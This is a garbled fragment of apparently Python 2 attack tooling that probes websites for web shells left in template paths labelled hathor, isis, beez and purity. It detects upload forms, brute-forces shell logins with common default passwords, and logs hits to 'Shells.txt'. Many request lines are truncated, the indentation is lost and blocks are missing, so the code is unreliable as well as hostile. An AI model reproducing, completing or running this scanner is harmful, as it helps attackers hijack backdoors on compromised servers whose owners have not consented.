print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
SH4_J_content = requests.get(SH4_J,timeout=15).content
if ' type="file"' in SH4_J_content or ' type=\'file\'' in SH4_J_content or ' type= "file"' in SH4_J_content or ' type= \'file\'' in SH4_J_content or ' type = "file"' in SH4_J_content or ' type = \'file\'' in SH4_J_content or ' type ="file"' in SH4_J_content or ' type =\'file\'' in SH4_J_content or ' type=file' in SH4_J_content or ' type =file' in SH4_J_content or ' type= file' in SH4_J_content or ' type = file' in SH4_J_content or 'Upload</a> ]</li><li>[' in SH4_J_content or 'upload</a><li><a>Sym' in SH4_J_content :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in SH4_J_content :
nhzgrf =,data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot =,data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t =,data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin =,data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r =,data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 =,data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 =,data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 =,data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 =,data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 =,data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 =,data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 =,data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 =,data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis =,data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[hathor]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
SH5_J_content = requests.get(SH5_J,timeout=15).content
if ' type="file"' in SH5_J_content or ' type=\'file\'' in SH5_J_content or ' type= "file"' in SH5_J_content or ' type= \'file\'' in SH5_J_content or ' type = "file"' in SH5_J_content or ' type = \'file\'' in SH5_J_content or ' type ="file"' in SH5_J_content or ' type =\'file\'' in SH5_J_content or ' type=file' in SH5_J_content or ' type =file' in SH5_J_content or ' type= file' in SH5_J_content or ' type = file' in SH5_J_content or 'Upload</a> ]</li><li>[' in SH5_J_content or 'upload</a><li><a>Sym' in SH5_J_content :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in SH5_J_content :
nhzgrf =,data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot =,data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t =,data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin =,data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r =,data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 =,data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 =,data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 =,data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 =,data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 =,data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 =,data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 =,data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 =,data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis =,data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
SH6_J_content = requests.get(SH6_J,timeout=15).content
if ' type="file"' in SH6_J_content or ' type=\'file\'' in SH6_J_content or ' type= "file"' in SH6_J_content or ' type= \'file\'' in SH6_J_content or ' type = "file"' in SH6_J_content or ' type = \'file\'' in SH6_J_content or ' type ="file"' in SH6_J_content or ' type =\'file\'' in SH6_J_content or ' type=file' in SH6_J_content or ' type =file' in SH6_J_content or ' type= file' in SH6_J_content or ' type = file' in SH6_J_content or 'Upload</a> ]</li><li>[' in SH6_J_content or 'upload</a><li><a>Sym' in SH6_J_content :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in SH6_J_content :
nhzgrf =,data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot =,data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t =,data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin =,data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r =,data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 =,data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 =,data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 =,data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 =,data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 =,data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 =,data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 =,data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 =,data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis =,data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[isis]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
SH7_J_content = requests.get(SH7_J,timeout=15).content
if ' type="file"' in SH7_J_content or ' type=\'file\'' in SH7_J_content or ' type= "file"' in SH7_J_content or ' type= \'file\'' in SH7_J_content or ' type = "file"' in SH7_J_content or ' type = \'file\'' in SH7_J_content or ' type ="file"' in SH7_J_content or ' type =\'file\'' in SH7_J_content or ' type=file' in SH7_J_content or ' type =file' in SH7_J_content or ' type= file' in SH7_J_content or ' type = file' in SH7_J_content or 'Upload</a> ]</li><li>[' in SH7_J_content or 'upload</a><li><a>Sym' in SH7_J_content :
print ' -| '+site +'/ --> {}[beez]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in SH7_J_content :
nhzgrf =,data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[beez]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot =,data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[beez]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t =,data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[beez]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin =,data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[beez]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r =,data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[beez]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 =,data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[beez]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 =,data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[beez]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 =,data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[beez]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 =,data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[beez]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 =,data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[beez]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 =,data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[beez]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 =,data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[beez]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 =,data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[beez]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis =,data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[beez]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
SH8_J_content = requests.get(SH8_J,timeout=15).content
if ' type="file"' in SH8_J_content or ' type=\'file\'' in SH8_J_content or ' type= "file"' in SH8_J_content or ' type= \'file\'' in SH8_J_content or ' type = "file"' in SH8_J_content or ' type = \'file\'' in SH8_J_content or ' type ="file"' in SH8_J_content or ' type =\'file\'' in SH8_J_content or ' type=file' in SH8_J_content or ' type =file' in SH8_J_content or ' type= file' in SH8_J_content or ' type = file' in SH8_J_content or 'Upload</a> ]</li><li>[' in SH8_J_content or 'upload</a><li><a>Sym' in SH8_J_content :
print ' -| '+site +'/ --> {}[purity]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in SH8_J_content :
nhzgrf =,data=password_nhzgrf,timeout=15).content
